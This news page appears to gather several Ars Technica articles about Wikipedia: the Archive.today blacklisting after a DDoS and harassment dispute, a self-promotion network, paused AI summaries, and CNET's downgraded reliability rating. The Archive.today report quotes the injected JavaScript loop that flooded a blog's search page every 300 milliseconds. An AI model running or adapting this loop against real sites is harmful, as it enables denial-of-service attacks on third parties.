wikipedia


Wikipedia blacklists Archive.today, starts removing 695,000 archive links

The English-language edition of Wikipedia is blacklisting Archive.today after the controversial archive site was used to direct a distributed denial of service (DDoS) attack against a blog.

In the course of discussing whether Archive.today should be deprecated because of the DDoS, Wikipedia editors discovered that the archive site altered snapshots of webpages to insert the name of the blogger who was targeted by the DDoS. The alterations were apparently fueled by a grudge against the blogger over a post that described how the Archive.today maintainer hid their identity behind several aliases.

“There is consensus to immediately deprecate archive.today, and, as soon as practicable, add it to the spam blacklist (or create an edit filter that blocks adding new links), and remove all links to it,” stated an update today on Wikipedia’s Archive.today discussion. “There is a strong consensus that Wikipedia should not direct its readers towards a website that hijacks users’ computers to run a DDoS attack (see WP:ELNO#3). Additionally, evidence has been presented that archive.today’s operators have altered the content of archived pages, rendering it unreliable.”

More than 695,000 links to Archive.today are distributed across 400,000 or so Wikipedia pages. The archive site is commonly used to bypass news paywalls, and the FBI has sought information on the site operator’s identity with a subpoena to domain registrar Tucows.

“Those in favor of maintaining the status quo rested their arguments primarily on the utility of archive.today for verifiability,” said today’s Wikipedia update. “However, an analysis of existing links has shown that most of its uses can be replaced. Several editors started to work out implementation details during this RfC [request for comment] and the community should figure out how to efficiently remove links to archive.today.”

Editors urged to remove links

Guidance published as a result of the decision asked editors to help remove and replace links to the following domain names used by the archive site: archive.today, archive.is, archive.ph, archive.fo, archive.li, archive.md, and archive.vn. The guidance says editors can remove Archive.today links when the original source is still online and has identical content; replace the archive link so it points to a different archive site, like the Internet Archive, Ghostarchive, or Megalodon; or “change the original source to something that doesn’t need an archive (e.g., a source that was printed on paper), or for which a link to an archive is only a matter of convenience.”
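As a rough illustration of the first step in that guidance, a script could flag citations whose hostname matches one of the listed domains. The sketch below is a hypothetical helper, not part of any Wikipedia tooling. The name `isArchiveTodayLink` and the decision to also match subdomains such as `www.` are assumptions made for the example.

```javascript
// Domains named in the guidance as belonging to the archive site.
const ARCHIVE_TODAY_DOMAINS = [
  "archive.today", "archive.is", "archive.ph", "archive.fo",
  "archive.li", "archive.md", "archive.vn",
];

// Hypothetical helper: returns true when a URL's hostname is one of the
// listed domains or a subdomain of one (the subdomain rule is an assumption).
function isArchiveTodayLink(url) {
  let hostname;
  try {
    hostname = new URL(url).hostname.toLowerCase();
  } catch {
    return false; // not a parseable absolute URL
  }
  return ARCHIVE_TODAY_DOMAINS.some(
    (domain) => hostname === domain || hostname.endsWith("." + domain)
  );
}
```

Under those assumptions, `isArchiveTodayLink("https://archive.ph/abc12")` returns `true`, while a link to a different archive site such as `https://web.archive.org/` returns `false`.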



Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site


DDoS hit blog that tried to uncover Archive.today founder’s identity in 2023.


Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a distributed denial of service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website’s anonymous maintainer.

In a request for comment page, Wikipedia’s volunteer editors were presented with three options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.

Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.

“Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive,” the Wikipedia request for comment said. “Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist.”

Discussion among editors has been ongoing since February 7. “Wikipedia’s need for verifiable citations is absolutely not more important than the security of users,” one editor in favor of blacklisting wrote. “We need verifiable citations so that we can maintain readers’ trust, however, in order to be trustworthy our references also have to be safe to access.”

Archive would be hard to replace

On the other side, an editor who supported Option C wrote that “Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of dead link tags that will never be resolved.”

Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.

One editor supported starting with Option B and eventually shifting to Option A with “the proper end goal being the WMF [Wikimedia Foundation] supporting some sort of archive system, whether their own original or directly supporting the Internet Archive’s work so it can be done more systematically.”

Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. “On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive,” one editor wrote. “It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time.”

Malicious code in CAPTCHA page

The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, “the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with,” the Wikipedia request for comment says. “Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual’s blog.”

The trustworthiness of Archive.today was discussed in light of evidence that the site’s founder threatened to create “a new category of AI porn” in retaliation against the blogger. The AI porn threat was mentioned by several editors.

“I echo others [that Option] A is looking like something we’ll have to do eventually, anyways, and at least this way we have a chance to do it on our terms,” one editor wrote. “I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn’t a trustworthy mirror, and isn’t going to remain one.”

One editor reported being “miserable” about supporting Option A, “but we cannot permit websites to rope our readers into being part of DDoS attacks.” Moreover, “The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It’s strange that we accept links to archive.today for this purpose but don’t accept the same for Anna’s Archive or Sci-Hub,” the editor wrote.

Patokallio told us in an email today, “it’s true that there simply are no alternatives to archive.today for many sources that archive.org does not/cannot cover,” and that he hopes the Wikipedia request for comment “leads to the Wikimedia Foundation creating one as suggested by multiple commenters in the thread.”

We emailed Archive.today’s webmaster address today about the Wikipedia discussion and will update this article if we get a response.

The Wikimedia Foundation, the nonprofit that hosts Wikipedia, chimed in on the discussion today. “Our view is that the value to verifiability that the site provides must be weighed against the security risks and violation of the trust of the people who click these links,” wrote Eric Mill, head of the foundation’s product safety and integrity group. “We (WMF) encourage the English Wikipedia community to carefully weigh the situation before making a decision on this unusual case.”

Noting that “Archive.today’s owner has not been deterred from continuing the ongoing DDoS,” Mill wrote that “the same actions that make archive.today unsafe may also reduce its usefulness for verifying content on Wikipedia. If the owners are willing to abuse their position to further their goals through malicious code, then it also raises questions about the integrity of the archive it hosts.”

It’s possible the Wikimedia Foundation will act even if the volunteer editors decide to maintain the status quo. “We know that WMF intervention is a big deal, but we also have not ruled it out, given the seriousness of the security concern for people who click the links that appear across many wikis,” Mill wrote.

Blogger tried to uncover founder’s identity

The Wikipedia request for comment acknowledged that whether to blacklist the site would be a difficult decision. There are “significant concerns for readers’ safety, as well as the long-term stability and integrity of the service,” but “a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites,” it said.

An update to the request for comment yesterday indicated that the attack had temporarily stopped but that the malicious code had since been reactivated. “Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!” it said.

The code’s first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. “Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources,” he wrote. The JavaScript code in the Archive.today CAPTCHA page is as follows:

        setInterval(function() {
            fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);
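To put the 300-millisecond interval in perspective, the arithmetic below estimates how many requests a single open CAPTCHA tab would send. This is only a back-of-the-envelope sketch: the function name is hypothetical, and it assumes the timer fires exactly on schedule, which browsers do not guarantee (background tabs are often throttled).

```javascript
// Interval between requests, in milliseconds, as quoted from the blog post.
const INTERVAL_MS = 300;

// Hypothetical helper: requests sent by one open tab over a given duration,
// assuming the timer fires exactly every INTERVAL_MS.
function requestsPerTab(durationMs) {
  return Math.floor(durationMs / INTERVAL_MS);
}

console.log(requestsPerTab(60 * 1000));      // one minute
console.log(requestsPerTab(60 * 60 * 1000)); // one hour
```

Under those assumptions, one tab would send 200 requests per minute, or 12,000 per hour.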

In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder “Denis Petrov,” which seems to be an alias. Patokallio wasn’t able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, “Masha Rabinovich.”

Patokallio seemed to be driven by curiosity and was impressed by Archive.today’s work. “It’s a testament to their persistence that [they’ve] managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee,” Patokallio’s 2023 post said. In his post this month, Patokallio said his 2023 blog post “gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn’t exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next two years and a bit.”

FBI case revives interest in 2023 blog

But in October 2025, the FBI sent a subpoena to domain registrar Tucows seeking “subscriber information on [the] customer behind archive.today” in connection with “a federal criminal investigation being conducted by the FBI.” We wrote about the subpoena, and our story included a link to Patokallio’s 2023 blog post in a sentence that said, “There are several indications that the [Archive.today] founder is from Russia.”

In an email to Ars, Patokallio told us that the DDoS attack “appears to be because you kindly mentioned my blog in your Nov 8, 2025 story.” Patokallio added that he is “as mystified by this as you probably are.” Articles about the subpoena by The Verge and Heise Online also linked to Patokallio’s 2023 blog post.

On January 8, 2026, Patokallio’s hosting company, Automattic, notified him that it received a GDPR [General Data Protection Regulation] complaint from a “Nora Puchreiner” alleging that the 2023 post “contains extensive personal data… presented in a narrative that is defamatory in tone and context.” Patokallio said that after he submitted a rebuttal, “Automattic sided with me and left the post up.”

Patokallio said he also “received a politely worded email from archive.today’s webmaster asking me to take down the post for a few months” on January 10. The email was classified as spam by Gmail, and he didn’t see it until five days later, he said. In the meantime, the DDoS started.

Patokallio said he replied to the webmaster’s email on January 15 and again on January 20 but didn’t hear back. He tried a third time on January 25, saying he would not take down the blog post but offering to “change some wording that you feel is being misrepresented.”

Emails threatened AI porn and other scams

Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, “I do not mind the post, but the issue is: journos from mainstream media (Heise, Verge, etc) cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience.”

In a later email, “Nora Puchreiner” wrote, “I do not care on your blog and its content. I just need the links from Heise and other media to be 404.” One message threatened to investigate “your Nazi grandfather” and “vibecode a gyrovague.gay dating app.” Another threatened to create a public association between Patokallio’s name and AI porn.

A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails’ veracity, but says the original version threatened to create “a patokallio.gay dating app,” not “a gyrovague.gay dating app.” The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio’s name in a sidebar and discloses that he works for Google in Sydney, Australia, while stating that the blog posts contain only his personal views.

In one email, Patokallio included a link to Wikipedia’s page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.

“And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?” the email said. Patokallio responded, “No, you’re Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last two years, with zero action on my side.”

A subsequent reply in the email thread contained the “Nazi grandfather” and “gay dating app” threats. Patokallio wrote that after these emails, it didn’t seem worthwhile to continue the discussion. “At this point it was pretty clear the conversation had run its course, so here we are,” Patokallio wrote in his February 1 blog post. “And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a ‘Nazi’ in Russia these days.”

While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn’t cause him any real harm. The Archive.today maintainer apparently intended to drive up Patokallio’s hosting costs, but “I have a flat fee plan, meaning this has cost me exactly zero dollars,” he wrote.

This article was updated with a statement from the Wikimedia Foundation and further comment from Patokallio.


Jon is a Senior IT Reporter for Ars Technica. He covers the telecom industry, Federal Communications Commission rulemakings, broadband consumer affairs, court cases, and government regulation of the tech industry.



Dedicated volunteer exposes “single largest self-promotion operation in Wikipedia’s history”

After a reduction in activity, things ramped up again in 2021, as IP addresses from around the world started creating Woodard references and articles once more. For instance, “addresses from Canada, Germany, Indonesia, the UK and other places added some trivia about Woodard to all 15 Wikipedia articles about the calea ternifolia.”

Then things got “more sophisticated.” From December 2021 through June 2025, 183 articles were created about Woodard, each in a different language’s Wikipedia and each by a unique account. These accounts followed a pattern of behavior: They were “created, often with a fairly generic name, and made a user page with a single image on it. They then made dozens of minor edits to unrelated articles, before creating an article about David Woodard, then making a dozen or so more minor edits before disappearing off the platform.”

Grnrchst believes that all the activity was meant to “create as many articles about Woodard as possible, and to spread photos of and information on Woodard to as many articles as possible, while hiding that activity as much as possible… I came to believe that David Woodard himself, or someone close to him, had been operating this network of accounts and IP addresses for the purposes of cynical self-promotion.”

After the Grnrchst report, Wikipedia’s global stewards removed 235 articles on Woodard from Wikipedia instances with few users or administrators. Larger Wikipedias were free to make their own community decisions, and they removed another 80 articles and banned numerous accounts.

“A full decade of dedicated self-promotion by an individual network has been undone in only a few weeks by our community,” Grnrchst noted.

In the end, just 20 articles about Woodard remain, such as this one in English, which does not mention the controversy.

We were unable to get in touch with Woodard, whose personal website is password-protected and only available “by invitation.”

Could the whole thing be some kind of “art project,” with the real payoff being exposure and being written about? Perhaps. But whatever the motive behind the decade-long effort to boost Woodard on Wikipedia, the incident reminds us just how much effort some people are willing to put into polluting open or public-facing projects for their own ends.



“Yuck”: Wikipedia pauses AI summaries after editor revolt

Generative AI is permeating the Internet, with chatbots and AI summaries popping up faster than we can keep track. Even Wikipedia, the vast repository of knowledge famously maintained by an army of volunteer human editors, is looking to add robots to the mix. The site began testing AI summaries in some articles over the past week, but the project has been frozen after editors voiced their opinion. And that opinion is: “yuck.”

The seeds of this project were planted at Wikimedia’s 2024 conference, where foundation representatives and editors discussed how AI could advance Wikipedia’s mission. The wiki on the so-called “Simple Article Summaries” notes that the editors who participated in the discussion believed the summaries could improve learning on Wikipedia.

According to 404 Media, Wikipedia announced the opt-in AI pilot on June 2, which was set to run for two weeks on the mobile version of the site. The summaries appeared at the top of select articles in a collapsed form. Users had to tap to expand and read the full summary. The AI text also included a highlighted “Unverified” badge.

Feedback from the larger community of editors was immediate and harsh. Some of the first comments were simply “yuck,” with others calling the addition of AI a “ghastly idea” and “PR hype stunt.”

Others expounded on the issues with adding AI to Wikipedia, citing a potential loss of trust in the site. Editors work together to ensure articles are accurate, featuring verifiable information and a neutral point of view. However, nothing is certain when you put generative AI in the driver’s seat. “I feel like people seriously underestimate the brand risk this sort of thing has,” said one editor. “Wikipedia’s brand is reliability, traceability of changes, and ‘anyone can fix it.’ AI is the opposite of these things.”



AI-generated articles prompt Wikipedia to downgrade CNET’s reliability rating

The hidden costs of AI

Futurism report highlights the reputational cost of publishing AI-generated content.


Wikipedia has downgraded tech website CNET’s reliability rating following extensive discussions among its editors regarding the impact of AI-generated content on the site’s trustworthiness, as noted in a detailed report from Futurism. The decision reflects concerns over the reliability of articles found on the tech news outlet after it began publishing AI-generated stories in 2022.

Around November 2022, CNET began publishing articles written by an AI model under the byline “CNET Money Staff.” In January 2023, Futurism brought widespread attention to the issue and discovered that the articles were full of plagiarism and mistakes. (Around that time, we covered plans to do similar automated publishing at BuzzFeed.) After the revelation, CNET management paused the experiment, but the reputational damage had already been done.

Wikipedia maintains a page called “Reliable sources/Perennial sources” that includes a chart featuring news publications and their reliability ratings as viewed from Wikipedia’s perspective. Shortly after the CNET news broke in January 2023, Wikipedia editors began a discussion thread on the Reliable Sources project page about the publication.

“CNET, usually regarded as an ordinary tech RS [reliable source], has started experimentally running AI-generated articles, which are riddled with errors,” wrote a Wikipedia editor named David Gerard. “So far the experiment is not going down well, as it shouldn’t. I haven’t found any yet, but any of these articles that make it into a Wikipedia article need to be removed.”

After other editors agreed in the discussion, they began the process of downgrading CNET’s reliability rating.

As of this writing, Wikipedia’s Perennial Sources list features three entries for CNET, one for each of three time periods: (1) before October 2020, when Wikipedia considered CNET a “generally reliable” source; (2) between October 2020 and October 2022, for which Wikipedia notes that the site was acquired by Red Ventures in October 2020, “leading to a deterioration in editorial standards,” and says there is no consensus about reliability; and (3) between November 2022 and the present, for which Wikipedia considers CNET “generally unreliable” after the site began using an AI tool “to rapidly generate articles riddled with factual inaccuracies and affiliate links.”

A screenshot of a chart featuring CNET’s reliability ratings, as found on Wikipedia’s “Perennial Sources” page.

Futurism reports that the issue with CNET’s AI-generated content also sparked a broader debate within the Wikipedia community about the reliability of sources owned by Red Ventures, such as Bankrate and CreditCards.com. Those sites published AI-generated content around the same period of time as CNET. The editors also criticized Red Ventures for not being forthcoming about where and how AI was being implemented, further eroding trust in the company’s publications. This lack of transparency was a key factor in the decision to downgrade CNET’s reliability rating.

In response to the downgrade and the controversies surrounding AI-generated content, CNET issued a statement saying that the site maintains high editorial standards.

“CNET is the world’s largest provider of unbiased tech-focused news and advice,” a CNET spokesperson said in a statement to Futurism. “We have been trusted for nearly 30 years because of our rigorous editorial and product review standards. It is important to clarify that CNET is not actively using AI to create new content. While we have no specific plans to restart, any future initiatives would follow our public AI policy.”

This article was updated on March 1, 2024, at 9:30 am to reflect fixes in the date ranges for CNET on the Perennial Sources page.
